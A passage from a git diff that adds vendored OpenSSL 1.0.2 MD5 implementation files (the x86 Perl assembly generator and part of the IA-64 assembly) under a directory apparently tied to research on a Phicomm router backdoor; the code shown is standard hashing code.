+md5_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md5_dgst.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md5_dgst.o: ../../include/openssl/symhacks.h ../md32_common.h md5_dgst.c
+md5_dgst.o: md5_locl.h
+md5_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+md5_one.o: ../../include/openssl/md5.h ../../include/openssl/opensslconf.h
+md5_one.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+md5_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+md5_one.o: ../../include/openssl/symhacks.h md5_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-586.pl
new file mode 100644
index 0000000..6cb66bb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-586.pl
@@ -0,0 +1,307 @@
+#!/usr/local/bin/perl
+
+# Normal is the
+# md5_block_x86(MD5_CTX *c, ULONG *X);
+# version, non-normal is the
+# md5_block_x86(MD5_CTX *c, ULONG *X,int blocks);
+
+$normal=0;
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],$0);
+
+$A="eax";
+$B="ebx";
+$C="ecx";
+$D="edx";
+$tmp1="edi";
+$tmp2="ebp";
+$X="esi";
+
+# What we need to load into $tmp for the next round
+%Ltmp1=("R0",&Np($C), "R1",&Np($C), "R2",&Np($C), "R3",&Np($D));
+@xo=(
+ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,	# R0
+ 1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12,	# R1
+ 5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2,	# R2
+ 0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9,	# R3
+ );
+
+&md5_block("md5_block_asm_data_order");
+&asm_finish();
+
+sub Np
+	{
+	local($p)=@_;
+	local(%n)=($A,$D,$B,$A,$C,$B,$D,$C);
+	return($n{$p});
+	}
+
+sub R0
+	{
+	local($pos,$a,$b,$c,$d,$K,$ki,$s,$t)=@_;
+
+	&mov($tmp1,$C)  if $pos < 0;
+	&mov($tmp2,&DWP($xo[$ki]*4,$K,"",0)) if $pos < 0; # very first one 
+
+	# body proper
+
+	&comment("R0 $ki");
+	&xor($tmp1,$d); # F function - part 2
+
+	&and($tmp1,$b); # F function - part 3
+	&lea($a,&DWP($t,$a,$tmp2,1));
+
+	&xor($tmp1,$d); # F function - part 4
+
+	&add($a,$tmp1);
+	&mov($tmp1,&Np($c)) if $pos < 1;	# next tmp1 for R0
+	&mov($tmp1,&Np($c)) if $pos == 1;	# next tmp1 for R1
+
+	&rotl($a,$s);
+
+	&mov($tmp2,&DWP($xo[$ki+1]*4,$K,"",0)) if ($pos != 2);
+
+	&add($a,$b);
+	}
+
+sub R1
+	{
+	local($pos,$a,$b,$c,$d,$K,$ki,$s,$t)=@_;
+
+	&comment("R1 $ki");
+
+	&lea($a,&DWP($t,$a,$tmp2,1));
+
+	&xor($tmp1,$b); # G function - part 2
+	&and($tmp1,$d); # G function - part 3
+
+	&mov($tmp2,&DWP($xo[$ki+1]*4,$K,"",0)) if ($pos != 2);
+	&xor($tmp1,$c);			# G function - part 4
+
+	&add($a,$tmp1);
+	&mov($tmp1,&Np($c)) if $pos < 1;	# G function - part 1
+	&mov($tmp1,&Np($c)) if $pos == 1;	# G function - part 1
+
+	&rotl($a,$s);
+
+	&add($a,$b);
+	}
+
+sub R2
+	{
+	local($n,$pos,$a,$b,$c,$d,$K,$ki,$s,$t)=@_;
+	# This one is different, only 3 logical operations
+
+if (($n & 1) == 0)
+	{
+	&comment("R2 $ki");
+	# make sure to do 'D' first, not 'B', else we clash with
+	# the last add from the previous round.
+
+	&xor($tmp1,$d); # H function - part 2
+
+	&xor($tmp1,$b); # H function - part 3
+	&lea($a,&DWP($t,$a,$tmp2,1));
+
+	&add($a,$tmp1);
+
+	&rotl($a,$s);
+
+	&mov($tmp2,&DWP($xo[$ki+1]*4,$K,"",0));
+	&mov($tmp1,&Np($c));
+	}
+else
+	{
+	&comment("R2 $ki");
+	# make sure to do 'D' first, not 'B', else we clash with
+	# the last add from the previous round.
+
+	&lea($a,&DWP($t,$a,$tmp2,1));
+
+	&add($b,$c);			# MOVED FORWARD
+	&xor($tmp1,$d); # H function - part 2
+
+	&xor($tmp1,$b); # H function - part 3
+	&mov($tmp2,&DWP($xo[$ki+1]*4,$K,"",0)) if ($pos != 2);
+
+	&add($a,$tmp1);
+	&mov($tmp1,&Np($c)) if $pos < 1;	# H function - part 1
+	&mov($tmp1,-1) if $pos == 1;		# I function - part 1
+
+	&rotl($a,$s);
+
+	&add($a,$b);
+	}
+	}
+
+sub R3
+	{
+	local($pos,$a,$b,$c,$d,$K,$ki,$s,$t)=@_;
+
+	&comment("R3 $ki");
+
+	# &not($tmp1)
+	&xor($tmp1,$d) if $pos < 0; 	# I function - part 2
+
+	&or($tmp1,$b);				# I function - part 3
+	&lea($a,&DWP($t,$a,$tmp2,1));
+
+	&xor($tmp1,$c); 			# I function - part 4
+	&mov($tmp2,&DWP($xo[$ki+1]*4,$K,"",0))	if $pos != 2; # load X/k value
+	&mov($tmp2,&wparam(0)) if $pos == 2;
+
+	&add($a,$tmp1);
+	&mov($tmp1,-1) if $pos < 1;	# H function - part 1
+	&add($K,64) if $pos >=1 && !$normal;
+
+	&rotl($a,$s);
+
+	&xor($tmp1,&Np($d)) if $pos <= 0; 	# I function - part = first time
+	&mov($tmp1,&DWP( 0,$tmp2,"",0)) if $pos > 0;
+	&add($a,$b);
+	}
+
+
+sub md5_block
+	{
+	local($name)=@_;
+
+	&function_begin_B($name,"",3);
+
+	# parameter 1 is the MD5_CTX structure.
+	# A	0
+	# B	4
+	# C	8
+	# D 	12
+
+	&push("esi");
+	 &push("edi");
+	&mov($tmp1,	&wparam(0)); # edi
+	 &mov($X,	&wparam(1)); # esi
+	&mov($C,	&wparam(2));
+	 &push("ebp");
+	&shl($C,	6);
+	&push("ebx");
+	 &add($C,	$X); # offset we end at
+	&sub($C,	64);
+	 &mov($A,	&DWP( 0,$tmp1,"",0));
+	&push($C);	# Put on the TOS
+	 &mov($B,	&DWP( 4,$tmp1,"",0));
+	&mov($C,	&DWP( 8,$tmp1,"",0));
+	 &mov($D,	&DWP(12,$tmp1,"",0));
+
+	&set_label("start") unless $normal;
+	&comment("");
+	&comment("R0 section");
+
+	&R0(-2,$A,$B,$C,$D,$X, 0, 7,0xd76aa478);
+	&R0( 0,$D,$A,$B,$C,$X, 1,12,0xe8c7b756);
+	&R0( 0,$C,$D,$A,$B,$X, 2,17,0x242070db);
+	&R0( 0,$B,$C,$D,$A,$X, 3,22,0xc1bdceee);
+	&R0( 0,$A,$B,$C,$D,$X, 4, 7,0xf57c0faf);
+	&R0( 0,$D,$A,$B,$C,$X, 5,12,0x4787c62a);
+	&R0( 0,$C,$D,$A,$B,$X, 6,17,0xa8304613);
+	&R0( 0,$B,$C,$D,$A,$X, 7,22,0xfd469501);
+	&R0( 0,$A,$B,$C,$D,$X, 8, 7,0x698098d8);
+	&R0( 0,$D,$A,$B,$C,$X, 9,12,0x8b44f7af);
+	&R0( 0,$C,$D,$A,$B,$X,10,17,0xffff5bb1);
+	&R0( 0,$B,$C,$D,$A,$X,11,22,0x895cd7be);
+	&R0( 0,$A,$B,$C,$D,$X,12, 7,0x6b901122);
+	&R0( 0,$D,$A,$B,$C,$X,13,12,0xfd987193);
+	&R0( 0,$C,$D,$A,$B,$X,14,17,0xa679438e);
+	&R0( 1,$B,$C,$D,$A,$X,15,22,0x49b40821);
+
+	&comment("");
+	&comment("R1 section");
+	&R1(-1,$A,$B,$C,$D,$X,16, 5,0xf61e2562);
+	&R1( 0,$D,$A,$B,$C,$X,17, 9,0xc040b340);
+	&R1( 0,$C,$D,$A,$B,$X,18,14,0x265e5a51);
+	&R1( 0,$B,$C,$D,$A,$X,19,20,0xe9b6c7aa);
+	&R1( 0,$A,$B,$C,$D,$X,20, 5,0xd62f105d);
+	&R1( 0,$D,$A,$B,$C,$X,21, 9,0x02441453);
+	&R1( 0,$C,$D,$A,$B,$X,22,14,0xd8a1e681);
+	&R1( 0,$B,$C,$D,$A,$X,23,20,0xe7d3fbc8);
+	&R1( 0,$A,$B,$C,$D,$X,24, 5,0x21e1cde6);
+	&R1( 0,$D,$A,$B,$C,$X,25, 9,0xc33707d6);
+	&R1( 0,$C,$D,$A,$B,$X,26,14,0xf4d50d87);
+	&R1( 0,$B,$C,$D,$A,$X,27,20,0x455a14ed);
+	&R1( 0,$A,$B,$C,$D,$X,28, 5,0xa9e3e905);
+	&R1( 0,$D,$A,$B,$C,$X,29, 9,0xfcefa3f8);
+	&R1( 0,$C,$D,$A,$B,$X,30,14,0x676f02d9);
+	&R1( 1,$B,$C,$D,$A,$X,31,20,0x8d2a4c8a);
+
+	&comment("");
+	&comment("R2 section");
+	&R2( 0,-1,$A,$B,$C,$D,$X,32, 4,0xfffa3942);
+	&R2( 1, 0,$D,$A,$B,$C,$X,33,11,0x8771f681);
+	&R2( 2, 0,$C,$D,$A,$B,$X,34,16,0x6d9d6122);
+	&R2( 3, 0,$B,$C,$D,$A,$X,35,23,0xfde5380c);
+	&R2( 4, 0,$A,$B,$C,$D,$X,36, 4,0xa4beea44);
+	&R2( 5, 0,$D,$A,$B,$C,$X,37,11,0x4bdecfa9);
+	&R2( 6, 0,$C,$D,$A,$B,$X,38,16,0xf6bb4b60);
+	&R2( 7, 0,$B,$C,$D,$A,$X,39,23,0xbebfbc70);
+	&R2( 8, 0,$A,$B,$C,$D,$X,40, 4,0x289b7ec6);
+	&R2( 9, 0,$D,$A,$B,$C,$X,41,11,0xeaa127fa);
+	&R2(10, 0,$C,$D,$A,$B,$X,42,16,0xd4ef3085);
+	&R2(11, 0,$B,$C,$D,$A,$X,43,23,0x04881d05);
+	&R2(12, 0,$A,$B,$C,$D,$X,44, 4,0xd9d4d039);
+	&R2(13, 0,$D,$A,$B,$C,$X,45,11,0xe6db99e5);
+	&R2(14, 0,$C,$D,$A,$B,$X,46,16,0x1fa27cf8);
+	&R2(15, 1,$B,$C,$D,$A,$X,47,23,0xc4ac5665);
+
+	&comment("");
+	&comment("R3 section");
+	&R3(-1,$A,$B,$C,$D,$X,48, 6,0xf4292244);
+	&R3( 0,$D,$A,$B,$C,$X,49,10,0x432aff97);
+	&R3( 0,$C,$D,$A,$B,$X,50,15,0xab9423a7);
+	&R3( 0,$B,$C,$D,$A,$X,51,21,0xfc93a039);
+	&R3( 0,$A,$B,$C,$D,$X,52, 6,0x655b59c3);
+	&R3( 0,$D,$A,$B,$C,$X,53,10,0x8f0ccc92);
+	&R3( 0,$C,$D,$A,$B,$X,54,15,0xffeff47d);
+	&R3( 0,$B,$C,$D,$A,$X,55,21,0x85845dd1);
+	&R3( 0,$A,$B,$C,$D,$X,56, 6,0x6fa87e4f);
+	&R3( 0,$D,$A,$B,$C,$X,57,10,0xfe2ce6e0);
+	&R3( 0,$C,$D,$A,$B,$X,58,15,0xa3014314);
+	&R3( 0,$B,$C,$D,$A,$X,59,21,0x4e0811a1);
+	&R3( 0,$A,$B,$C,$D,$X,60, 6,0xf7537e82);
+	&R3( 0,$D,$A,$B,$C,$X,61,10,0xbd3af235);
+	&R3( 0,$C,$D,$A,$B,$X,62,15,0x2ad7d2bb);
+	&R3( 2,$B,$C,$D,$A,$X,63,21,0xeb86d391);
+
+	# &mov($tmp2,&wparam(0));	# done in the last R3
+	# &mov($tmp1,	&DWP( 0,$tmp2,"",0)); # done is the last R3
+
+	&add($A,$tmp1);
+	 &mov($tmp1,	&DWP( 4,$tmp2,"",0));
+
+	&add($B,$tmp1);
+	&mov($tmp1,	&DWP( 8,$tmp2,"",0));
+
+	&add($C,$tmp1);
+	&mov($tmp1,	&DWP(12,$tmp2,"",0));
+
+	&add($D,$tmp1);
+	&mov(&DWP( 0,$tmp2,"",0),$A);
+
+	&mov(&DWP( 4,$tmp2,"",0),$B);
+	&mov($tmp1,&swtmp(0)) unless $normal;
+
+	&mov(&DWP( 8,$tmp2,"",0),$C);
+	 &mov(&DWP(12,$tmp2,"",0),$D);
+
+	&cmp($tmp1,$X) unless $normal;			# check count
+	 &jae(&label("start")) unless $normal;
+
+	&pop("eax"); # pop the temp variable off the stack
+	 &pop("ebx");
+	&pop("ebp");
+	 &pop("edi");
+	&pop("esi");
+	 &ret();
+	&function_end_B($name);
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-ia64.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-ia64.S
new file mode 100644
index 0000000..e7de08d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-ia64.S
@@ -0,0 +1,992 @@
+/* Copyright (c) 2005 Hewlett-Packard Development Company, L.P.
+
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.  */
+
+//	Common registers are assigned as follows:
+//
+//	COMMON
+//
+//	t0		Const Tbl Ptr	TPtr
+//	t1		Round Constant	TRound
+//	t4		Block residual	LenResid
+//	t5		Residual Data	DTmp
+//
+//	{in,out}0	Block 0 Cycle	RotateM0
+//	{in,out}1	Block Value 12	M12
+//	{in,out}2	Block Value 8	M8
+//	{in,out}3	Block Value 4	M4
+//	{in,out}4	Block Value 0	M0
+//	{in,out}5	Block 1 Cycle	RotateM1
+//	{in,out}6	Block Value 13	M13
+//	{in,out}7	Block Value 9	M9
+//	{in,out}8	Block Value 5	M5
+//	{in,out}9	Block Value 1	M1
+//	{in,out}10	Block 2 Cycle	RotateM2
+//	{in,out}11	Block Value 14	M14
+//	{in,out}12	Block Value 10	M10
+//	{in,out}13	Block Value 6	M6
+//	{in,out}14	Block Value 2	M2
+//	{in,out}15	Block 3 Cycle	RotateM3
+//	{in,out}16	Block Value 15	M15
+//	{in,out}17	Block Value 11	M11
+//	{in,out}18	Block Value 7	M7
+//	{in,out}19	Block Value 3	M3
+//	{in,out}20	Scratch			Z
+//	{in,out}21	Scratch			Y
+//	{in,out}22	Scratch			X
+//	{in,out}23	Scratch			W
+//	{in,out}24	Digest A		A
+//	{in,out}25	Digest B		B
+//	{in,out}26	Digest C		C
+//	{in,out}27	Digest D		D
+//	{in,out}28	Active Data Ptr	DPtr
+//	in28		Dummy Value		-
+//	out28		Dummy Value		-
+//	bt0			Coroutine Link	QUICK_RTN
+//
+///	These predicates are used for computing the padding block(s) and
+///	are shared between the driver and digest co-routines
+//
+//	pt0			Extra Pad Block	pExtra
+//	pt1			Load next word	pLoad
+//	pt2			Skip next word	pSkip
+//	pt3			Search for Pad	pNoPad
+//	pt4			Pad Word 0		pPad0
+//	pt5			Pad Word 1		pPad1
+//	pt6			Pad Word 2		pPad2
+//	pt7			Pad Word 3		pPad3
+
+#define	DTmp		r19
+#define	LenResid	r18
+#define	QUICK_RTN	b6
+#define	TPtr		r14
+#define	TRound		r15
+#define	pExtra		p6
+#define	pLoad		p7
+#define	pNoPad		p9
+#define	pPad0		p10
+#define	pPad1		p11
+#define	pPad2		p12
+#define	pPad3		p13
+#define	pSkip		p8
+
+#define	A_		out24
+#define	B_		out25
+#define	C_		out26
+#define	D_		out27
+#define	DPtr_		out28
+#define	M0_		out4
+#define	M1_		out9
+#define	M10_		out12
+#define	M11_		out17
+#define	M12_		out1
+#define	M13_		out6
+#define	M14_		out11
+#define	M15_		out16
+#define	M2_		out14
+#define	M3_		out19
+#define	M4_		out3
+#define	M5_		out8
+#define	M6_		out13
+#define	M7_		out18
+#define	M8_		out2
+#define	M9_		out7
+#define	RotateM0_	out0
+#define	RotateM1_	out5
+#define	RotateM2_	out10
+#define	RotateM3_	out15
+#define	W_		out23
+#define	X_		out22
+#define	Y_		out21
+#define	Z_		out20
+
+#define	A		in24
+#define	B		in25
+#define	C		in26
+#define	D		in27
+#define	DPtr		in28
+#define	M0		in4
+#define	M1		in9
+#define	M10		in12
+#define	M11		in17
+#define	M12		in1
+#define	M13		in6
+#define	M14		in11
+#define	M15		in16
+#define	M2		in14
+#define	M3		in19
+#define	M4		in3
+#define	M5		in8
+#define	M6		in13
+#define	M7		in18
+#define	M8		in2
+#define	M9		in7
+#define	RotateM0	in0
+#define	RotateM1	in5
+#define	RotateM2	in10
+#define	RotateM3	in15
+#define	W		in23
+#define	X		in22
+#define	Y		in21
+#define	Z		in20
+
+/* register stack configuration for md5_block_asm_data_order(): */
+#define	MD5_NINP	3
+#define	MD5_NLOC	0
+#define MD5_NOUT	29
+#define MD5_NROT	0
+
+/* register stack configuration for helpers: */
+#define	_NINPUTS	MD5_NOUT
+#define	_NLOCALS	0
+#define _NOUTPUT	0
+#define	_NROTATE	24	/* this must be <= _NINPUTS */
+
+#if defined(_HPUX_SOURCE) && !defined(_LP64)
+#define	ADDP	addp4
+#else
+#define	ADDP	add
+#endif
+
+#if defined(_HPUX_SOURCE) || defined(B_ENDIAN)
+#define HOST_IS_BIG_ENDIAN
+#endif
+
+//	Macros for getting the left and right portions of little-endian words
+
+#define	GETLW(dst, src, align)	dep.z dst = src, 32 - 8 * align, 8 * align
+#define	GETRW(dst, src, align)	extr.u dst = src, 8 * align, 32 - 8 * align
+
+//	MD5 driver
+//
+//		Reads an input block, then calls the digest block
+//		subroutine and adds the results to the accumulated
+//		digest.  It allocates 32 outs which the subroutine
+//		uses as it's inputs and rotating
+//		registers. Initializes the round constant pointer and
+//		takes care of saving/restoring ar.lc
+//
+///	INPUT
+//
+//	in0		Context Ptr		CtxPtr0
+//	in1		Input Data Ptr		DPtrIn
+//	in2		Integral Blocks		BlockCount
+//	rp		Return Address		-
+//
+///	CODE
+//
+//	v2		Input Align		InAlign
+//	t0		Shared w/digest		-
+//	t1		Shared w/digest		-
+//	t2		Shared w/digest		-
+//	t3		Shared w/digest		-
+//	t4		Shared w/digest		-
+//	t5		Shared w/digest		-
+//	t6		PFS Save		PFSSave
+//	t7		ar.lc Save		LCSave
+//	t8		Saved PR		PRSave
+//	t9		2nd CtxPtr		CtxPtr1
+//	t10		Table Base		CTable
+//	t11		Table[0]		CTable0
+//	t13		Accumulator A		AccumA
+//	t14		Accumulator B		AccumB
+//	t15		Accumulator C		AccumC
+//	t16		Accumulator D		AccumD
+//	pt0		Shared w/digest		-
+//	pt1		Shared w/digest		-
+//	pt2		Shared w/digest		-
+//	pt3		Shared w/digest		-
+//	pt4		Shared w/digest		-
+//	pt5		Shared w/digest		-
+//	pt6		Shared w/digest		-
+//	pt7		Shared w/digest		-
+//	pt8		Not Aligned		pOff
+//	pt8		Blocks Left		pAgain
+
+#define	AccumA		r27
+#define	AccumB		r28
+#define	AccumC		r29
+#define	AccumD		r30
+#define	CTable		r24
+#define	CTable0		r25
+#define	CtxPtr0		in0
+#define	CtxPtr1		r23
+#define	DPtrIn		in1
+#define	BlockCount	in2
+#define	InAlign		r10
+#define	LCSave		r21
+#define	PFSSave		r20
+#define	PRSave		r22
+#define	pAgain		p63
+#define	pOff		p63
+
+	.text
+
+/* md5_block_asm_data_order(MD5_CTX *c, const void *data, size_t num)
+
+     where:
+      c: a pointer to a structure of this type:
+
+	   typedef struct MD5state_st
+	     {
+	       MD5_LONG A,B,C,D;
+	       MD5_LONG Nl,Nh;
+	       MD5_LONG data[MD5_LBLOCK];
+	       unsigned int num;
+	     }
+	   MD5_CTX;
+
+      data: a pointer to the input data (may be misaligned)
+      num:  the number of 16-byte blocks to hash (i.e., the length
+            of DATA is 16*NUM.
+
+   */
+
+	.type	md5_block_asm_data_order, @function
+	.global	md5_block_asm_data_order
+	.align	32
+	.proc	md5_block_asm_data_order
+md5_block_asm_data_order:
+.md5_block:
+	.prologue
+{	.mmi
+	.save	ar.pfs, PFSSave
+	alloc	PFSSave = ar.pfs, MD5_NINP, MD5_NLOC, MD5_NOUT, MD5_NROT
+	ADDP	CtxPtr1 = 8, CtxPtr0
+	mov	CTable = ip
+}
+{	.mmi
+	ADDP	DPtrIn = 0, DPtrIn
+	ADDP	CtxPtr0 = 0, CtxPtr0
+	.save	ar.lc, LCSave
+	mov	LCSave = ar.lc
+}
+;;
+{	.mmi
+	add	CTable = .md5_tbl_data_order#-.md5_block#, CTable
+	and	InAlign = 0x3, DPtrIn
+}
+
+{	.mmi
+	ld4	AccumA = [CtxPtr0], 4
+	ld4	AccumC = [CtxPtr1], 4
+	.save pr, PRSave
+	mov	PRSave = pr
+	.body
+}
+;;
+{	.mmi
+	ld4	AccumB = [CtxPtr0]
+	ld4	AccumD = [CtxPtr1]
+	dep	DPtr_ = 0, DPtrIn, 0, 2
+} ;;
+#ifdef HOST_IS_BIG_ENDIAN
+	rum	psr.be;;	// switch to little-endian
+#endif
+{	.mmb
+	ld4	CTable0 = [CTable], 4
+	cmp.ne	pOff, p0 = 0, InAlign
+(pOff)	br.cond.spnt.many .md5_unaligned
+} ;;
+
+//	The FF load/compute loop rotates values three times, so that
+//	loading into M12 here produces the M0 value, M13 -> M1, etc.
+
+.md5_block_loop0:
+{	.mmi
+	ld4	M12_ = [DPtr_], 4
+	mov	TPtr = CTable
+	mov	TRound = CTable0
+} ;;
+{	.mmi
+	ld4	M13_ = [DPtr_], 4
+	mov	A_ = AccumA
+	mov	B_ = AccumB
+} ;;
+{	.mmi
+	ld4	M14_ = [DPtr_], 4
+	mov	C_ = AccumC
+	mov	D_ = AccumD
+} ;;
+{	.mmb
+	ld4	M15_ = [DPtr_], 4
+	add	BlockCount = -1, BlockCount
+	br.call.sptk.many QUICK_RTN = md5_digest_block0
+} ;;
+
+//	Now, we add the new digest values and do some clean-up
+//	before checking if there's another full block to process
+
+{	.mmi
+	add	AccumA = AccumA, A_
+	add	AccumB = AccumB, B_
+	cmp.ne	pAgain, p0 = 0, BlockCount
+}
+{	.mib
+	add	AccumC = AccumC, C_
+	add	AccumD = AccumD, D_
+(pAgain) br.cond.dptk.many .md5_block_loop0
+} ;;
+
+.md5_exit:
+#ifdef HOST_IS_BIG_ENDIAN
+	sum	psr.be;;	// switch back to big-endian mode
+#endif
+{	.mmi
+	st4	[CtxPtr0] = AccumB, -4
+	st4	[CtxPtr1] = AccumD, -4
+	mov	pr = PRSave, 0x1ffff ;;
+}
+{	.mmi
+	st4	[CtxPtr0] = AccumA
+	st4	[CtxPtr1] = AccumC
+	mov	ar.lc = LCSave
+} ;;
+{	.mib
+	mov	ar.pfs = PFSSave
+	br.ret.sptk.few	rp
+} ;;
+
+#define	MD5UNALIGNED(offset)						\
+.md5_process##offset:							\
+{	.mib ;								\
+	nop	0x0	;						\
+	GETRW(DTmp, DTmp, offset) ;					\
+} ;;									\
+.md5_block_loop##offset:						\
+{	.mmi ;								\
+	ld4	Y_ = [DPtr_], 4 ;					\
+	mov	TPtr = CTable ;						\
+	mov	TRound = CTable0 ;					\
+} ;;									\
+{	.mmi ;								\
+	ld4	M13_ = [DPtr_], 4 ;					\
+	mov	A_ = AccumA ;						\
+	mov	B_ = AccumB ;						\
+} ;;									\
+{	.mii ;								\
+	ld4	M14_ = [DPtr_], 4 ;					\
+	GETLW(W_, Y_, offset) ;						\
+	mov	C_ = AccumC ;						\
+}									\
+{	.mmi ;								\
+	mov	D_ = AccumD ;;						\
+	or	M12_ = W_, DTmp ;					\
+	GETRW(DTmp, Y_, offset) ;					\
+}									\
+{	.mib ;								\
+	ld4	M15_ = [DPtr_], 4 ;					\
+	add	BlockCount = -1, BlockCount ;				\
+	br.call.sptk.many QUICK_RTN = md5_digest_block##offset;		\
+} ;;									\
+{	.mmi ;								\
+	add	AccumA = AccumA, A_ ;					\
+	add	AccumB = AccumB, B_ ;					\
+	cmp.ne	pAgain, p0 = 0, BlockCount ;				\
+}									\
+{	.mib ;								\
+	add	AccumC = AccumC, C_ ;					\
+	add	AccumD = AccumD, D_ ;					\
+(pAgain) br.cond.dptk.many .md5_block_loop##offset ;			\
+} ;;									\
+{	.mib ;								\
+	nop	0x0 ;							\
+	nop	0x0 ;							\
+	br.cond.sptk.many .md5_exit ;					\
+} ;;
+
+	.align	32
+.md5_unaligned:
+//
+//	Because variable shifts are expensive, we special case each of
+//	the four alignements. In practice, this won't hurt too much
+//	since only one working set of code will be loaded.
+//
+{	.mib
+	ld4	DTmp = [DPtr_], 4
+	cmp.eq	pOff, p0 = 1, InAlign
+(pOff)	br.cond.dpnt.many .md5_process1
+} ;;
+{	.mib
+	cmp.eq	pOff, p0 = 2, InAlign
+	nop	0x0
+(pOff)	br.cond.dpnt.many .md5_process2
+} ;;
+	MD5UNALIGNED(3)
+	MD5UNALIGNED(1)
+	MD5UNALIGNED(2)
+
+	.endp md5_block_asm_data_order
+
+
+// MD5 Perform the F function and load
+//
+// Passed the first 4 words (M0 - M3) and initial (A, B, C, D) values,
+// computes the FF() round of functions, then branches to the common
+// digest code to finish up with GG(), HH, and II().
+//
+// INPUT
+//
+// rp Return Address -
+//
+// CODE
+//
+// v0 PFS bit bucket PFS
+// v1 Loop Trip Count LTrip
+// pt0 Load next word pMore
+
+/* For F round: */
+#define LTrip	r9
+#define PFS	r8
+#define pMore	p6
+
+/* For GHI rounds: */
+#define T	r9
+#define U	r10
+#define V	r11
+
+#define COMPUTE(a, b, s, M, R)			\
+{						\
+	.mii ;					\
+	ld4 TRound = [TPtr], 4 ;		\
+	dep.z Y = Z, 32, 32 ;;			\
+	shrp Z = Z, Y, 64 - s ;			\
+} ;;						\
+{						\
+	.mmi ;					\
+	add a = Z, b ;				\
+	mov R = M ;				\
+	nop 0x0 ;				\
+} ;;
+
+#define LOOP(a, b, s, M, R, label)		\
+{	.mii ;					\
+	ld4 TRound = [TPtr], 4 ;		\
+	dep.z Y = Z, 32, 32 ;;			\
+	shrp Z = Z, Y, 64 - s ;			\
+} ;;						\
+{	.mib ;					\
+	add a = Z, b ;				\
+	mov R = M ;				\
+	br.ctop.sptk.many label ;		\
+} ;;
+
+// G(B, C, D) = (B & D) | (C & ~D)
+
+#define G(a, b, c, d, M)			\
+{	.mmi ;					\
+	add Z = M, TRound ;			\
+	and Y = b, d ;				\
+	andcm X = c, d ;			\
+} ;;						\
+{	.mii ;					\
+	add Z = Z, a ;				\
+	or Y = Y, X ;;				\
+	add Z = Z, Y ;				\
+} ;;
+
+// H(B, C, D) = B ^ C ^ D
+
+#define H(a, b, c, d, M)			\
+{	.mmi ;					\
+	add Z = M, TRound ;			\
+	xor Y = b, c ;				\
+	nop 0x0 ;				\
+} ;;						\
+{	.mii ;					\
+	add Z = Z, a ;				\
+	xor Y = Y, d ;;				\
+	add Z = Z, Y ;				\
+} ;;
+
+// I(B, C, D) = C ^ (B | ~D)
+//
+// However, since we have an andcm operator, we use the fact that
+//
+// Y ^ Z == ~Y ^ ~Z
+//
+// to rewrite the expression as
+//
+// I(B, C, D) = ~C ^ (~B & D)
+
+#define I(a, b, c, d, M)			\
+{	.mmi ;					\
+	add Z = M, TRound ;			\
+	andcm Y = d, b ;			\
+	andcm X = -1, c ;			\
+} ;;						\
+{	.mii ;					\
+	add Z = Z, a ;				\
+	xor Y = Y, X ;;				\
+	add Z = Z, Y ;				\
+} ;;
+
+#define GG4(label)				\
+	G(A, B, C, D, M0)			\
+	COMPUTE(A, B, 5, M0, RotateM0)		\
+	G(D, A, B, C, M1)			\
+	COMPUTE(D, A, 9, M1, RotateM1)		\
+	G(C, D, A, B, M2)			\
+	COMPUTE(C, D, 14, M2, RotateM2)		\
+	G(B, C, D, A, M3)			\
+	LOOP(B, C, 20, M3, RotateM3, label)
+
+#define HH4(label)				\
+	H(A, B, C, D, M0)			\
+	COMPUTE(A, B, 4, M0, RotateM0)		\
+	H(D, A, B, C, M1)			\
+	COMPUTE(D, A, 11, M1, RotateM1)		\
+	H(C, D, A, B, M2)			\
+	COMPUTE(C, D, 16, M2, RotateM2)		\
+	H(B, C, D, A, M3)			\
+	LOOP(B, C, 23, M3, RotateM3, label)
+
+#define II4(label)				\
+	I(A, B, C, D, M0)			\
+	COMPUTE(A, B, 6, M0, RotateM0)		\
+	I(D, A, B, C, M1)			\
+	COMPUTE(D, A, 10, M1, RotateM1)		\
+	I(C, D, A, B, M2)			\
+	COMPUTE(C, D, 15, M2, RotateM2)		\
+	I(B, C, D, A, M3)			\
+	LOOP(B, C, 21, M3, RotateM3, label)
+
+#define FFLOAD(a, b, c, d, M, N, s)		\
